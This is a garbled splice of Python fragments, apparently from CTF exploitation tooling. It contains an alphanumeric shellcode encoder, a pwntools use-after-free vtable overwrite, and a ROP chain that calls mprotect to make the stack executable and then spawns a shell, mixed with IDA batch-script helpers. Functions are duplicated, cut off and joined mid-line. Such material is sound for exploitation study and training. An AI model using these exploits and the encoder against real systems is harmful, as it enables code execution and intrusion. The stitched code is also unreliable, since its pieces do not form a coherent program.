def encode(self,raw_sc,addr_in_reg='rax',pre_len=0,is_rdi_zero=0):
r'''
raw_sc:需要encode的机器码
addr_in_reg: 指向shellcode附近的寄存器名称,默认rax
pre_len:因为默认rax指向shellcode附近,这个字段的意思为 reg+pre_len == encoder的起始地址,默认0
is_rdi_zero: 跑shellcode之前rdi是否为0,如果确定为0,可以设置此flag为1,这样可以省去几byte空间,默认0即rdi不为0
encoder_len:留给encoder的最大字节长度(会自动调整)
地址构成:
rax --> xxxxx \
xxxxx | pre_len (adjust addr to rax)
xxxxx /
encoder yyyyy \
yyyyy | encoder_len
yyyyy /
your_sc zzzzz \
zzzzz | encoded shellcode
zzzzz |
zzzzz /
'''
save_log_level = context.log_level
context.log_level = 99
if not is_rdi_zero:
self.prologue = self.zero_rdi+self.init_encoder
else:
self.prologue = self.init_encoder
addr_in_reg=addr_in_reg.lower()
if addr_in_reg != 'rax':
if addr_in_reg not in self.vaild_reg:
print '[-] not vaild reg'
return None
else:
self.prologue=asm('push {};pop rax;\n'.format(addr_in_reg))+self.prologue
self.raw_sc = raw_sc
self.pre_len = pre_len
self.encoder_len=len(self.prologue)
if not self.encode_raw_sc():
print '[-] error while encoding raw_sc'
return None
while True:
debug('AE64: trying length {}'.format(self.encoder_len))
encoder = asm(self.gen_encoder(self.pre_len+self.encoder_len))
final_sc = self.prologue+encoder
if self.encoder_len >= len(final_sc) and self.encoder_len-len(final_sc) <= 6:# nop len
break
self.encoder_len=len(final_sc)
nop_len = self.encoder_len - len(final_sc)
context.log_level = save_log_level
success('shellcode generated, length info -> prologue:{} + encoder:{} + nop:{} + encoded_sc:{} == {}'.format(
len(self.prologue),
len(final_sc)-len(self.prologue),
nop_len,
len(self.enc_raw_sc),
len(final_sc)+nop_len+len(self.enc_raw_sc)))
final_sc += self.nop2*(nop_len/2)+self.nop*(nop_len%2)+self.enc_raw_sc
return final_sc
def worker(paths, script=None, args=None, handler=None):
result = {}
for path in paths:
tmp = run_ida_script(path, script, args, handler)
debug(path)
#info(path)
if tmp != None:
result[path] = tmp
+8 will contain give_shell.
We need to add our payload two times, since else only the woman instance is overwritten, and
calling man will crash.
"""
pwn.context.terminal = ["tmux", "splitw", "-h"]
exe = pwn.context.binary = pwn.ELF('./uaf')
random_file = "/tmp/%s" % pwn.util.fiddling.randoms(10)
size_of_new = 8
payload_length = size_of_new
address_of_virtual_address_table = 0x401570
payload = pwn.p64(address_of_virtual_address_table -
8) + b'a' * (size_of_new - 8)
pwn.debug(pwn.hexdump(payload))
gdbscript = '''
# Before "delete m;"
break *0x00401082
# before "m->introduce();"
break *0x00400fe2
# before "new"
break *0x00401020
continue
'''
if pwn.args.GDB:
pwn.write('/tmp/payload', payload)
val = rop_chain[x * 4:(x + 1) * 4]
val = pwn.u32(val)
write_stack_offset(x + addr, val)
mprotect_addr = exe.symbols['mprotect']
io = start()
io.recvuntil("=== Welcome to SECPROG calculator ===\n")
stack_addr = get_absolute_stack_address_below_main()
stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096)
pwn.success("Stack absolute address is 0x%08x" % stack_addr)
pwn.success("Stack absolute address mod pagesize is 0x%08x" %
stack_addr_mod_pagesize)
rop_chain = (
pwn.p32(mprotect_addr) + # return from calc, go to mprotect
pwn.p32(stack_addr + 16)
+ # return address after mprotect, go to shellcode
pwn.p32(stack_addr_mod_pagesize) + # mprotect param: addr
pwn.p32(4096) + # mprotect param: page size
pwn.p32(7) + # mprotect param: rwx
pwn.asm(pwn.shellcraft.sh()
) # shellcode after stack has been marked executable
)
pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain))
write_rop_chain_to_addr(main_ret_address_offset, rop_chain)
io.sendline()
io.interactive()
if os.path.exists(output_path):
os.remove(output_path)
if script_path == None:
command = f"{IDA_PATH} -A -B {bin_abs_path}"
else:
if args != None:
args = " ".join(args)
else:
args = ""
command = f"{IDA_PATH} -A -S\"{script_path} {output_path} {arch} {args}\" {bin_abs_path}"
command = f"IDALOG=\"{log_path}\" {command} "
try:
debug(F"Running script for {bin_abs_path}...")
debug(command)
subprocess.run(command, shell=True).check_returncode()
debug("Done")
except subprocess.CalledProcessError as e:
warn(f"error happened in {bin_abs_path}, {e}")
return None
if os.path.exists(output_path):
if handler!=None and script_path!=None :
output = handler(output_path)
return output
def worker(paths, script=None, args=None, handler=None):